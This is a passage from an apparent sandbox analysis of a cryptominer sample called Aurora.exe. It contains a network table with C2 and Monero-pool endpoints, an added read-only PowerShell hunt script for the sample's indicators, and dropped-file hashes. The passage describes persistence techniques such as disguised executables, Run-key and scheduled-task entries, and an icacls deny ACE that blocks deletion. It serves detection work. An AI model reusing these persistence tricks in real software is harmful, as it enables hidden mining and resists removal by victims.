US       8.8.8.8:53              xmr-us-east1.nanopool.org      udp
CA       51.222.106.253:14444    xmr-us-east1.nanopool.org      tcp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              253.106.222.51.in-addr.arpa    udp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              101.58.20.217.in-addr.arpa     udp
US       192.64.119.108:55326    auroraforge.art                tcp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
CN       123.123.123.123:55713   thesirenmika.com               tcp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              14.227.111.52.in-addr.arpa     udp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
US       192.64.119.108:55326    auroraforge.art                tcp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              tse1.mm.bing.net               udp
US       150.171.27.10:443       tse1.mm.bing.net               tcp
US       150.171.27.10:443       tse1.mm.bing.net               tcp
US       150.171.27.10:443       tse1.mm.bing.net               tcp
US       150.171.27.10:443       tse1.mm.bing.net               tcp
US       150.171.27.10:443       tse1.mm.bing.net               tcp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
CN       123.123.123.123:55713   thesirenmika.com               tcp
GB       154.81.220.233:28105                                   tcp
GB       154.81.220.233:28105                                   tcp
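The PowerShell hunt script below is an added example and is not part of the sandbox report or of the sample. It checks a live Windows host, read-only, for the persistence artifacts recorded in the command lines above (the HKCU Run value OneDriveUpdate, the scheduled tasks OneDriveUpdate and ConsoleWindowsHost, the dropped executables, and the icacls deny ACE on Msedge.exe) and for the endpoints in the Network table (established TCP connections to the four non-DNS destinations and cached lookups of the three non-Microsoft domains). Indicator values are taken from this report; the Add-Finding helper, the $Findings list and the category labels are this script's own. The sandbox ran as the user Admin; the script assumes the same relative paths under whichever profile runs it.

```powershell
# Added hunt script (not from the sandbox report): looks for the Aurora.exe persistence
# and network indicators recorded above. Reports only; removes nothing.
# Run in an elevated Windows PowerShell 5.1+ session.
$Findings = [System.Collections.Generic.List[string]]::new()

function Add-Finding([string]$Category, [string]$Detail) {
    $script:Findings.Add("[$Category] $Detail")
}

# 1. Run-key persistence written by the powershell.exe command line in the report.
$runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$runVal = Get-ItemProperty -Path $runKey -Name 'OneDriveUpdate' -ErrorAction SilentlyContinue
if ($runVal) { Add-Finding 'RunKey' "OneDriveUpdate = $($runVal.OneDriveUpdate)" }

# 2. Scheduled tasks created by schtasks and Register-ScheduledTask (both with RunLevel Highest).
foreach ($taskName in 'OneDriveUpdate', 'ConsoleWindowsHost') {
    $task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
    if ($task) {
        $exe = ($task.Actions | ForEach-Object { $_.Execute }) -join ';'
        Add-Finding 'ScheduledTask' "$taskName -> $exe (RunLevel=$($task.Principal.RunLevel))"
    }
}

# 3. Dropped payloads, relative to the user profile (sandbox user was Admin; assumed identical
#    layout for other users). Get-Item -Force is needed because attrib +h hides Msedge.exe.
$dropped = @(
    'AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe',
    'AppData\Local\Msedge.exe',
    'AppData\Roaming\Google\Chrome\svchost.exe',
    'AppData\Roaming\AdobeLicense\AdobeUpdate.exe',
    'AppData\Roaming\Microsoft Edge\build.exe',
    'AppData\Roaming\OneDrive Update Tool\OneDrive.exe',
    'AppData\Roaming\VLC Media Player\vlc.exe'
)
foreach ($rel in $dropped) {
    $full = Join-Path $env:USERPROFILE $rel
    if (Test-Path -LiteralPath $full) {
        $hash = (Get-FileHash -LiteralPath $full -Algorithm SHA256).Hash
        $attr = (Get-Item -LiteralPath $full -Force).Attributes
        Add-Finding 'DroppedFile' "$full sha256=$hash attrs=$attr"
    }
}

# 4. The icacls step denies Everyone (S-1-1-0) write/append/attribute rights on Msedge.exe so the
#    file resists deletion and overwriting; look for that deny ACE by SID, not by display name.
$edge = Join-Path $env:USERPROFILE 'AppData\Local\Msedge.exe'
if (Test-Path -LiteralPath $edge) {
    $deny = (Get-Acl -LiteralPath $edge).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq 'S-1-1-0'
    }
    if ($deny) { Add-Finding 'ACL' "Deny ACE for Everyone on $edge ($($deny.FileSystemRights))" }
}

# 5. Network indicators from the Network table: C2 and mining-pool endpoints.
$c2 = @{
    '154.81.220.233'  = 28105
    '192.64.119.108'  = 55326
    '123.123.123.123' = 55713
    '51.222.106.253'  = 14444
}
Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $c2.ContainsKey($_.RemoteAddress) -and $_.RemotePort -eq $c2[$_.RemoteAddress] } |
    ForEach-Object {
        $proc = (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        Add-Finding 'Network' "$($_.RemoteAddress):$($_.RemotePort) owned by PID $($_.OwningProcess) ($proc)"
    }
$domains = 'auroraforge.art', 'thesirenmika.com', 'xmr-us-east1.nanopool.org'
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $domains -contains $_.Entry } |
    ForEach-Object { Add-Finding 'DnsCache' "$($_.Entry) -> $($_.Data)" }

if ($Findings.Count -eq 0) { 'No Aurora.exe indicators found.' } else { $Findings }
```

Two caveats when acting on the output. The powercfg commands in the report zero the standby and hibernate timeouts so the miner is never interrupted; they leave no file artifact, so check the active scheme with `powercfg /query SCHEME_CURRENT SUB_SLEEP` by hand. And because of the deny ACE, a plain delete of Msedge.exe fails even for an administrator; strip the ACE first with `icacls <path> /remove:d Everyone` (and `attrib -r -h -a <path>`) before removing the file.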

Files

memory/4000-0-0x0000000000FA0000-0x0000000002A6A000-memory.dmp

memory/4000-1-0x00000000768B0000-0x00000000768B1000-memory.dmp

memory/4000-6-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-5-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-4-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-3-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-2-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-7-0x0000000076890000-0x0000000076980000-memory.dmp

memory/4000-10-0x0000000076890000-0x0000000076980000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

MD5 65f0a85c4b056d6bcee60c49e2372e35
SHA1 6af820a2030950617bf150777af4a43a06a17184
SHA256 d64768ea74224057220bff451504b6128ddfb6161617b668626c490c84b3ae8e
SHA512 7a50bd0b3908f830494b2bff13a051ba0cdc7900934dbf8a62616f6d29b914f05f8029bbcc429a095254ebb6ab2a2d92c05dd6aebf57e34cde20f152243df383

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

MD5 c9a9d471428a5f92068c0823e6454254
SHA1 8b8ee8612b9b8bfbb165b3a8ca0d4a377b589dd2
SHA256 b0ffaa8c7d8fe1e804afc87e6f7659483c69d421911ddbfc410270011b91bfb5
SHA512 ca34022e99a48639fb3566ec4eb901a2f91121aee6a1f1bc601492dd94387873afc8af499aefed8d644aef8f564ca46a12ea40176da7f8d7b4e60f4b505ac8af

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

MD5 3b4f58cd4bca7274be25e885be00798b
SHA1 eb57c281d8324a1079db97c9da43483a65debbed
SHA256 a6832546e1d261c33deea58e1cbb8a391af91628b130454d55aef3e292862d80
SHA512 dc909730b2feacba3c14c98a2b443d5c12dfd74ce74db53cf7e564e01707ac365811e4d3b95c0cefe2b87ebd1b074fb4a395360911c3d11de4fa8957e9bad121

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

MD5 b9fc8581b52abfc6b563da731438e27d
SHA1 43111fe9b307c850a379fe2d64d279e994680de3
SHA256 e03debe75b2f4f4c937c50773064b9a692b262bfce4472e67900edf3f7726058
SHA512 c62540e73870caf9a93fbc2396ac99867f8f6e87661240d7642022130008bdb769954f1e8a58d13698172e62cc5b7d44a73b2f1d999db47822eb294c629436a5

memory/2680-51-0x00000000006A0000-0x00000000009CE000-memory.dmp

memory/4972-52-0x0000000000450000-0x000000000046E000-memory.dmp

memory/4972-54-0x0000000005400000-0x0000000005A18000-memory.dmp

memory/2680-53-0x0000000005730000-0x0000000005CD4000-memory.dmp

memory/4972-55-0x0000000004CD0000-0x0000000004CE2000-memory.dmp

memory/4972-57-0x0000000004D30000-0x0000000004D6C000-memory.dmp

memory/2128-60-0x0000000000400000-0x0000000000724000-memory.dmp

memory/2912-62-0x0000000005920000-0x0000000005F48000-memory.dmp

memory/4972-59-0x0000000004D70000-0x0000000004DBC000-memory.dmp

memory/2912-58-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

memory/2128-63-0x00000000058F0000-0x0000000005982000-memory.dmp

memory/4972-64-0x0000000004FE0000-0x00000000050EA000-memory.dmp

memory/2128-65-0x00000000059A0000-0x00000000059AA000-memory.dmp

memory/4000-70-0x0000000076890000-0x0000000076980000-memory.dmp

memory/2912-71-0x0000000006130000-0x0000000006196000-memory.dmp

memory/2912-69-0x00000000060C0000-0x0000000006126000-memory.dmp

memory/2912-68-0x00000000058F0000-0x0000000005912000-memory.dmp

memory/2912-72-0x00000000061C0000-0x0000000006514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4vdao4e2.35k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4000-73-0x0000000000FA0000-0x0000000002A6A000-memory.dmp

memory/2912-83-0x00000000067B0000-0x00000000067CE000-memory.dmp

memory/2912-99-0x0000000006D60000-0x0000000006D7E000-memory.dmp

memory/2912-88-0x0000000006D80000-0x0000000006DB2000-memory.dmp

memory/2912-100-0x0000000007990000-0x0000000007A33000-memory.dmp

memory/2912-89-0x000000006EC60000-0x000000006ECAC000-memory.dmp

memory/2128-101-0x00000000063B0000-0x0000000006400000-memory.dmp

memory/2128-102-0x0000000006600000-0x00000000066B2000-memory.dmp

memory/2912-104-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

memory/2912-103-0x0000000008120000-0x000000000879A000-memory.dmp

memory/2912-105-0x0000000007B50000-0x0000000007B5A000-memory.dmp

memory/2912-106-0x0000000007D60000-0x0000000007DF6000-memory.dmp

memory/2912-107-0x0000000007CE0000-0x0000000007CF1000-memory.dmp

memory/2912-108-0x0000000007D10000-0x0000000007D1E000-memory.dmp

memory/2912-109-0x0000000007D20000-0x0000000007D34000-memory.dmp

memory/2912-110-0x0000000007E20000-0x0000000007E3A000-memory.dmp

memory/2912-111-0x0000000007E00000-0x0000000007E08000-memory.dmp

memory/2912-112-0x0000000007E40000-0x0000000007E62000-memory.dmp

memory/4220-115-0x00007FF77CAB0000-0x00007FF77D04A000-memory.dmp

memory/3588-116-0x0000013727BC0000-0x0000013727BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee530ff1ea089a500333b8acc9174f3f
SHA1 f3b81059c86f6ab0e70ea46dda56c3775f6dd028
SHA256 4a3023ef9663912f4f7b16ea642c54a4de921b7f1ba7982550e39ed90b29621f
SHA512 045623986ccc8d037cdde5106c9c9a674bf85e6d54854ed80c0992779e99472c1fc9784ac8e5fa50e4849b25eb6473cc91e9ea524bdddc3ad8ec62f7fb60a86e

memory/4220-131-0x00007FF77CAB0000-0x00007FF77D04A000-memory.dmp

memory/724-133-0x00007FF6CE8C0000-0x00007FF6CEE5A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 fee026663fcb662152188784794028ee
SHA1 3c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256 dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA512 7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d95b08252ed624f6d91b46523f110f29
SHA1 17577997bc1fb5d3fbe59be84013165534415dc3
SHA256 342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02
SHA512 0c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257

memory/1220-151-0x0000021A12150000-0x0000021A12170000-memory.dmp

memory/724-150-0x00007FF6CE8C0000-0x00007FF6CEE5A000-memory.dmp

memory/2960-152-0x00007FF725C80000-0x00007FF725CA9000-memory.dmp

memory/1220-153-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-155-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/2960-156-0x00007FF725C80000-0x00007FF725CA9000-memory.dmp

memory/1220-157-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-159-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-161-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-163-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-165-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-167-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-169-0x00007FF665070000-0x00007FF66585F000-memory.dmp

memory/1220-171-0x00007FF665070000-0x00007FF66585F000-memory.dmp